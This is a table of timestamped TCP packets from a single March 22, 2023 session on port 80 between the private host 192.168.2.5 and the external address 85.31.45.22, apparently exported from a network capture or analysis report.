Mar 22, 2023 11:21:18.824589014 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.824615002 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.824652910 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.824736118 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.824815035 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.824898005 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.824970007 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.825050116 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.825087070 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.825133085 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.825201988 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.825247049 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.825328112 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.825680017 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.825761080 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.825788021 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.825850010 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.825941086 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.826003075 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.827310085 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.827367067 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.827426910 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.827491999 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.827491999 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.827491999 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.827651024 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.827709913 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.827725887 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.827768087 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.832844019 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.832937002 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.833050013 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.833050013 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.836112022 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.836169958 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.836422920 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.836422920 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.851330042 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.851830006 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.869539976 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.869605064 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.869662046 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.869705915 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.869810104 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.869873047 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.869844913 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.869965076 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.869982004 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.870028973 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.870084047 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.870095968 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.870107889 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.870147943 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.870183945 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.870193958 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.870208025 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.870261908 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.870275974 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.870312929 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.870348930 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.870371103 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.870452881 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.870532036 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.870570898 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.870655060 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.870780945 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.870831966 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.870951891 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.870974064 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.870974064 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.870996952 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.871007919 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.871061087 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.871078968 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.871162891 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.871191978 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.871258974 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.871371984 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.871478081 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.871570110 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.871570110 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.871592999 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.871675968 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.871685982 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.871759892 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.871789932 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.871877909 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.871906996 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.871963978 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.871984959 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.872031927 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.872165918 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.872239113 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.872256041 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.872338057 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.872659922 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.872709036 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.872770071 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.872812986 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.872812986 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.872816086 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.872878075 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.872878075 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.872909069 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.872970104 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.873025894 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.873083115 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.873100042 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.873212099 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.873222113 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.873276949 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.873353004 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.873434067 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.873435020 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.873481035 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.873497009 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.873543978 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.873656988 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.873733044 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.878520966 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.878580093 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.878623009 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.878665924 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.878710032 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.879055977 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.896929026 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.897123098 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.914391041 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.914447069 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.914475918 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.914500952 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.914637089 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.914705992 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.914735079 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.914796114 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.914810896 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.914853096 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.914918900 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.914974928 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.915126085 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.915149927 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.915186882 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.915230989 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.915232897 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.915282965 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.915393114 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.915457010 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.915477991 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.915527105 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.915546894 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.915589094 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.916228056 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.916277885 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.916301012 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.916325092 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.916351080 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.916373968 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.916397095 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.916419983 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.916452885 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.916503906 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.916512966 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.916562080 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.916630030 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.916693926 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.916826963 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.916908979 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.916930914 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.916975975 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.916990995 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.917018890 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.917097092 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.917112112 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.917217970 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.917217970 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.917284012 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.917363882 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.917392015 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.917468071 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.917535067 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.917583942 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.917743921 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.917743921 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.917797089 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.917875051 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.917908907 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.917933941 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.917979956 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.917989016 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.918026924 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.918068886 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.918118000 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.918179989 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.918390989 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.918418884 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.918483019 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.918483019 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.918540955 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.918613911 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.918648958 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.918720007 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.918725967 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.918788910 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.918828011 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.918899059 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.918947935 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.918973923 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.919014931 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.919051886 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.919069052 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.919136047 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.919222116 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.919290066 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.919382095 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.919450998 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.919502974 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.919573069 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.919606924 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.919682026 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.919792891 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.919857979 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.919939041 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.919962883 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.919987917 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.920001030 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.920037985 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.920054913 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.920263052 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.920289993 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.920346022 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.920378923 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.920389891 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.920458078 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.920469046 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.920536995 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.920839071 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.920866966 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.920890093 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.920948982 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.920948982 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.921011925 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.921039104 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.921089888 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.921113968 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.921118021 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.921180964 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.921221972 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.921292067 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.921308041 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.921377897 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.921441078 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.921506882 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.921545029 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.921627998 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.921714067 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.921788931 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.921845913 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.921845913 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.921907902 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.921931028 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.921998024 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.922039986 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.922182083 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.922204971 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.922265053 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.922297001 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.922310114 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.922398090 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.922432899 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.922513008 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.922550917 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.922621012 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.922661066 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.922739983 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.922821999 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.922894001 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.922920942 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.922944069 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.922997952 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.923028946 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.923094988 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.923094988 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.923177958 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.923252106 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.923312902 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.923398972 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.923666000 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.923691988 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.923716068 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.923762083 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.923801899 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.941498041 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.941605091 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.941663980 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.941710949 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.941783905 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.941783905 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.941783905 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.941783905 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.959697008 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.959758043 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.959805965 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.959853888 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.959923029 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.959971905 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.959975004 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.960040092 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.960110903 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.960160971 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.960191965 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.960206985 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.960227966 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.960262060 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.960315943 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.960365057 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.960378885 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.960419893 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.960859060 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.960911036 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.960957050 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.960966110 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.960994959 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.961004972 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.961034060 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.961057901 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.961184978 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.961235046 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.961256981 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.961307049 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.961323977 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.961376905 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.961395025 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.961424112 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.961441040 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.961488008 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.961512089 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.961586952 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.961600065 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.961668968 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.961777925 CET	80	49694	85.31.45.22	192.168.2.5
